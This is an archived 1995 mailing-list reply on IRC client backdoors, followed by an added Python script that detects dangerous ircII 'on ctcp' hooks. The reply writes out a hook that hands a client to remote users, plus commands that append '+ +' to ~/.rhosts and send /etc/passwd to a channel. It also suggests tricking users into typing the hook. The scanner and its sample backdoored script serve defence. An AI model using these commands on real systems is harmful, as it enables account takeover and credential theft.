Re: IRC Security Loophole

Kernel Panic (lwells@netcom.com)
Fri, 3 Feb 1995 18:30:53 -0800 (PST)

On Fri, 3 Feb 1995, Silicon Avatar wrote:

> On Fri, 3 Feb 1995, Lorna Leong wrote:
> 
> > 
> > Hi,
> > 
> > I read somewhere that there is a security loophole in IRC. I don't know 
> > anything else about it but I would like to find out more information 
> > about this. I heard that information about this IRC loophole can be found 
> > by FTP at ftp.cert.org, but I couldn't find anything relevant there.
> 
> If you are talking about the "jupe" or "grok" hole, it was temporary, and
> merely a hacked version of the client floating around at "trusted" sites.
> 
> To my knowledge, these "hacks" have been removed and are no longer a threat
> (unless someone is propagating these older clients.)
> 
> Simply put, you could "CTCP grok [command]" (CTCP being a method of
> communication over IRC) someone, and have that command executed,
> unknowingly, off the account.

No, IRC holes are a more serious threat than you give them credit for.
For example, if I were to add to a script (or better yet make someone 
type) the following:

/on ^ctcp "% % JUPE" $3-

They would be just as much in my control as if they were on a hacked client.
From this, you can do:

/ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts

or

/ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd

There's more to IRC backdoors than making people say stupid stuff on a
channel. I hope this example clears that up a little.



/dev/kmem


-
This sig deleted for brevity
-
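The backdoor above works because the `on ^ctcp` hook hands whatever the remote user sends after the CTCP keyword (`$3-`) straight back to the client as a command. Below is an added example, not from the original post, that scans an ircII-style script for hooks of that shape; the ircII argument convention ($0 nick, $2 CTCP type, $3- arguments) is assumed and the sample `.ircrc` lines are constructed.

```python
"""Flag ircII-style `on ctcp` hooks that execute remote CTCP arguments.
Added example for this thread; sample script lines below are constructed."""
import re

# `on ctcp` / `on ^ctcp` hook definitions: quoted match pattern, then body.
HOOK_RE = re.compile(r'^\s*/?on\s+\^?ctcp\s+"([^"]*)"\s*(.*)$', re.IGNORECASE)

# Expansions that splice in the remote user's CTCP arguments:
# $3- is "word 3 to end", $3 / $4 ... single words, $* is everything.
REMOTE_ARGS_RE = re.compile(r'\$(\*|[3-9]-?|[1-9][0-9]-?)')

# /exec (or bare exec inside a hook body) hands its arguments to a shell.
EXEC_RE = re.compile(r'(^|[\s{;])/?exec\b', re.IGNORECASE)


def classify_hook(line):
    """Return None for a non-hook line, else (pattern, body, reason) where
    reason is 'ok' or why the hook is dangerous."""
    m = HOOK_RE.match(line)
    if not m:
        return None
    pattern, body = m.group(1), m.group(2).strip()
    # Body is nothing but remote arguments: the peer's text runs as a command.
    if REMOTE_ARGS_RE.fullmatch(body):
        return (pattern, body, 'remote CTCP arguments executed as a command')
    # Remote arguments reach /exec, i.e. a shell, inside the hook body.
    if EXEC_RE.search(body) and REMOTE_ARGS_RE.search(body):
        return (pattern, body, 'remote CTCP arguments passed to /exec')
    return (pattern, body, 'ok')


def scan_script(text):
    """Return [(line_no, pattern, body, reason)] for every dangerous hook."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        result = classify_hook(line)
        if result and result[2] != 'ok':
            findings.append((n, result[0], result[1], result[2]))
    return findings


# Constructed sample .ircrc: two normal hooks, two backdoored ones.
SAMPLE_IRCRC = """\
on ^ctcp "% % VERSION" nctcp $0 VERSION ircII 2.8
/on ^ctcp "% % JUPE" $3-
on ctcp "% % PING" nctcp $0 PING $3-
on ^ctcp "% % RUN" exec $3-
"""

if __name__ == "__main__":
    for n, pattern, body, reason in scan_script(SAMPLE_IRCRC):
        print(f'line {n}: on ctcp "{pattern}" -> {body!r}: {reason}')
```

Note that the PING hook echoes `$3-` back to the sender and is correctly left alone: only hooks that run the remote text as a command or feed it to `exec` are reported.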